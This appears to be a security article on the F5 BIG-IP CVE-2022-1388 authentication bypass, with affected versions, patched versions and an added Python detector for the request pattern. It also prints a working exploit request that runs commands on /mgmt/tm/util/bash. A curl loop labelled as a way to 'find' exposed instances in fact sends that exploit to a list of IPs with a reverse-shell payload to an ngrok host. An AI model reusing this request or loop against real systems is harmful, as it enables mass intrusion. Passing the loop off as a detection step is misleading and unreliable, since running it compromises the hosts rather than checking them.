Threat actors have begun mass exploitation of the critical remote code execution vulnerability, tracked as CVE-2022-1388, affecting F5 BIG-IP. On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControl REST component of its BIG-IP product with a CVSSv3 base score of 9.8.

Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems. This could range anywhere from deploying cryptocurrency miners to dropping web shells for follow-on attacks, such as information theft and ransomware.

"This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only," reads the advisory published by the vendor.

What is F5 BIG-IP?

F5 BIG-IP is a blend of software and hardware that acts as a load balancer and a full proxy, giving administrators control over the traffic that passes through the network. F5 BIG-IP is most often found in the United States and in the Hospital & Health Care industry.

The flaw affects the following versions:

16.1.0 – 16.1.2
15.1.0 – 15.1.5
14.1.0 – 14.1.4
13.1.0 – 13.1.4
12.1.0 – 12.1.6
11.6.1 – 11.6.5

How to detect CVE-2022-1388?

For organizations looking to understand whether their F5 BIG-IP instances are vulnerable to exploitation, a bash one-liner has been released that can be run to determine whether a specific instance of BIG-IP is exploitable.

POST /mgmt/tm/util/bash HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host
Content-type: application/json
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 42

{"command": "run", "utilCmdArgs": "-c id"}

Vulnerability detection against a URL.

$ python CVE-2022-1388.py -u https://192.168.2.110
[+] https://192.168.2.110 is vulnerable!!!
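A defender-side check for the request shape shown above, added here as an example and not part of the original article or of F5's tooling: it parses a raw HTTP request and flags the header combination the bypass relies on (a Connection header that names X-F5-Auth-Token as hop-by-hop, so the front-end proxy drops it, combined with a Basic admin credential against the iControl REST command endpoint). The host name and the benign second request are constructed sample data.

```python
import base64
import binascii

# Constructed sample: the bypass request shape from this page, with a made-up host.
EXPLOIT_SAMPLE = (
    "POST /mgmt/tm/util/bash HTTP/1.1\r\n"
    "Host: bigip.example.internal\r\n"
    "Connection: close, X-F5-Auth-Token, X-Forwarded-For\r\n"
    "Content-Type: application/json\r\n"
    "X-F5-Auth-Token: anything\r\n"
    "Authorization: Basic YWRtaW46\r\n"
    "Content-Length: 42\r\n\r\n"
    '{"command": "run", "utilCmdArgs": "-c id"}'
)

# Constructed sample: an ordinary token-authenticated iControl REST call.
BENIGN_SAMPLE = (
    "GET /mgmt/tm/sys/version HTTP/1.1\r\n"
    "Host: bigip.example.internal\r\n"
    "Connection: keep-alive\r\n"
    "X-F5-Auth-Token: SAMPLETOKEN\r\n\r\n"
)

def parse_request(raw):
    """Split a raw HTTP request into (method, path, {lowercased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers

def suspicious(raw):
    """Return the reasons a request matches the CVE-2022-1388 bypass pattern."""
    _method, path, h = parse_request(raw)
    reasons = []
    if not path.lower().startswith("/mgmt/"):
        return reasons  # only the iControl REST surface is of interest
    conn = [t.strip().lower() for t in h.get("connection", "").split(",")]
    if "x-f5-auth-token" in conn:
        reasons.append("Connection header lists X-F5-Auth-Token (proxy strips it)")
    auth = h.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            user = base64.b64decode(auth.split(None, 1)[1]).decode("ascii", "replace")
        except (binascii.Error, IndexError):
            user = ""
        if user.split(":", 1)[0] == "admin" and "x-f5-auth-token" in h:
            reasons.append("Basic admin credential sent alongside X-F5-Auth-Token")
    if path.lower().startswith("/mgmt/tm/util/bash"):
        reasons.append("command execution endpoint /mgmt/tm/util/bash")
    return reasons
```

Run the check over management-plane access logs or a proxy capture; a single hit on the Connection header condition is worth investigating even without the other two.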

One-liner to find F5 BIG-IP instances exposed to the RCE

cat url.txt | while read ip; do curl -sk --max-time 2 -H "Content-Type: application/json" "https://$ip/mgmt/tm/util/bash" -d '{"command":"run","utilCmdArgs":"-c 'exec bash -i &>/dev/tcp/0.tcp.ngrok.io/14717<&1'"}'; done

Mitigation Guidance

We recommend that customers update their F5 BIG-IP deployments to one of the following versions that have patches to mitigate CVE-2022-1388:

  • 17.0.0
  • 16.1.2.2
  • 15.1.5.1
  • 14.1.4.6
  • 13.1.5